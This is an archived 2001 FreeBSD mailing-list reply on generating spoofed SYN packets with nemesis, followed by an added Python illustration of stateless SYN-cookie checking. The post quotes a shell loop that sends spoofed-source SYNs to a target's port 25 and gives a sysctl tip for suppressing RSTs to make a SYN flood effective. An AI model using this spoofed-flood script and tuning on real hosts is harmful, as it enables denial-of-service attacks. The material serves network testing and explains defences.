Date:      Fri, 9 Mar 2001 15:15:49 -0800
From:      "Jonathan Graehl" <jonathan@graehl.org>
To:        "Freebsd-Net" <freebsd-net@freebsd.org>
Cc:        "Walter Goralski" <walterg@juniper.net>
Subject:   RE: generating SYN packets with /usr/ports/net/nemesis and sh
Message-ID:  <NCBBLOALCKKINBNNEDDLKEDMDMAA.jonathan@graehl.org>
In-Reply-To: <NCBBLOALCKKINBNNEDDLCEDJDMAA.jonathan@graehl.org>

Replying to self (multiple personality disorder?):

One caveat ... if you're trying to simulate the resource-exhaustion effects of
a true SYN flood (rather than simply testing the ability of your firewall /
intrusion detection system to react to a flood), then you will need to prevent
autogeneration of RSTs by your TCP stack in reply to the TCP SYN ACK replies
from the host you are attacking.  This could be accomplished with
firewall rules (I haven't done this on FreeBSD, but I believe you use ipfw).

It is more easily accomplished with:
sysctl -w net.inet.tcp.blackhole=1

(udp.blackhole presumably suppresses generation of ICMP port unreachable when
there is nobody listening on a UDP port)

Traditionally .blackhole has been used to make port scanners' lives more
difficult (they will have to concurrently initiate/manage/time out pending
probes, or else proceed extremely slowly if using the default TCP connection
timeout), but tcp.blackhole can also facilitate an effective SYN flood attack.

For several years, most production servers have used TCP syncookies when faced
with a flood of SYNs ... the server, using no local state, sends a SYN ACK with
the server initial sequence number chosen to encode various state and to present
an unforgeable secret hash, so that SYN ACKs from the initiator can be verified
without having to remember anything about the embryonic connection.

> #!/bin/sh
> # Send 100 SYNs to port 25, one per source port 50000..50099
> # -S spoofed source, -D target, -fS set SYN flag, -x source port, -y dest port
> i=50000
> while [ $i -lt 50100 ]; do
>     nemesis-tcp -S 209.68.199.246 -D 209.68.199.242 -fS -x $i -y 25
>     i=$(($i + 1))
> done
>
> ... seems to work fine; a perl script would give a more legible for
> loop though ;)
>
> --
> Jonathan Graehl
>   email: jonathan@graehl.org
>   web: http://jonathan.graehl.org/

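The stateless SYN-cookie handshake sketched in the message, as an added example that is not part of the original post and not FreeBSD's or any real stack's implementation. The cookie layout (6 bits of a one-minute counter, 2 bits of MSS index, 24 bits of keyed hash), the server secret, the MSS table and the acceptance window of one previous period are all assumptions made here for illustration; the addresses and ports in the demo are the ones from the nemesis script above.

```python
"""SYN-cookie style stateless SYN/SYN-ACK/ACK verification (illustrative)."""
import hashlib
import hmac
import ipaddress
import struct
import time

# Assumptions for this example (not from the message): a per-server secret,
# a 4-entry MSS table selected by 2 cookie bits, and a 60-second counter.
SERVER_SECRET = b"constructed-secret-rotate-regularly"
MSS_TABLE = (536, 1300, 1440, 1460)
COUNTER_PERIOD_S = 60
MAX_COUNTER_AGE = 1  # accept cookies minted in the current or previous period


def _hash24(client_addr, server_addr, sport, dport, client_isn, counter):
    """24-bit keyed hash binding the 4-tuple, the client's ISN and the counter."""
    msg = struct.pack(
        "!4s4sHHII",
        ipaddress.IPv4Address(client_addr).packed,
        ipaddress.IPv4Address(server_addr).packed,
        sport, dport, client_isn & 0xFFFFFFFF, counter & 0xFFFFFFFF,
    )
    digest = hmac.new(SERVER_SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:3], "big")


def make_cookie(client_addr, server_addr, sport, dport, client_isn, mss, counter=None):
    """Server ISN for the SYN-ACK; nothing about the SYN is stored locally."""
    if counter is None:
        counter = int(time.time() // COUNTER_PERIOD_S)
    # Largest table entry not exceeding the MSS the client advertised.
    mss_idx = 0
    for i, m in enumerate(MSS_TABLE):
        if m <= mss:
            mss_idx = i
    h = _hash24(client_addr, server_addr, sport, dport, client_isn, counter)
    return ((counter & 0x3F) << 26) | (mss_idx << 24) | h


def check_cookie(client_addr, server_addr, sport, dport, seq, ack, now_counter=None):
    """Validate the client's third-packet ACK. Returns the MSS to use, or None."""
    if now_counter is None:
        now_counter = int(time.time() // COUNTER_PERIOD_S)
    cookie = (ack - 1) & 0xFFFFFFFF      # our ISN echoed back, plus one
    client_isn = (seq - 1) & 0xFFFFFFFF  # the client's SYN sequence number, plus one
    counter_bits = cookie >> 26
    mss_idx = (cookie >> 24) & 0x3
    got_hash = cookie & 0xFFFFFF
    for age in range(MAX_COUNTER_AGE + 1):
        counter = now_counter - age
        if (counter & 0x3F) != counter_bits:
            continue  # cookie was not minted in this period
        expected = _hash24(client_addr, server_addr, sport, dport, client_isn, counter)
        # Constant-time compare so timing does not leak hash bits to a guesser.
        if hmac.compare_digest(expected.to_bytes(3, "big"), got_hash.to_bytes(3, "big")):
            return MSS_TABLE[mss_idx]
    return None


def demo():
    """Constructed exchange: legitimate client, late ACK, stale ACK, forged ACK."""
    client, server = "209.68.199.246", "209.68.199.242"
    sport, dport, client_isn = 50000, 25, 0x1234ABCD
    t = 1000  # constructed counter value (period number)
    cookie = make_cookie(client, server, sport, dport, client_isn, mss=1460, counter=t)
    args = (client, server, sport, dport, client_isn + 1, cookie + 1)
    return {
        # Third packet arrives in the same period: accepted, MSS recovered.
        "ok": check_cookie(*args, now_counter=t),
        # One period later: still inside the acceptance window.
        "late_ok": check_cookie(*args, now_counter=t + 1),
        # Two periods later: rejected without any stored state to consult.
        "stale": check_cookie(*args, now_counter=t + 2),
        # A flooder who never saw the SYN-ACK cannot guess the 24 hash bits.
        "forged": check_cookie(client, server, sport, dport, client_isn + 1,
                               (cookie ^ 0x100) + 1, now_counter=t),
    }


if __name__ == "__main__":
    print(demo())
```

The point the message makes is visible in check_cookie: the server rebuilds everything it needs from the ACK's sequence and acknowledgement numbers plus its secret, so spoofed SYNs whose SYN-ACKs are never answered cost it nothing to forget. Spoofed SYNs that do get answered (the RST problem the message warns about) are handled on the attacker's side, not here.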
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?NCBBLOALCKKINBNNEDDLKEDMDMAA.jonathan>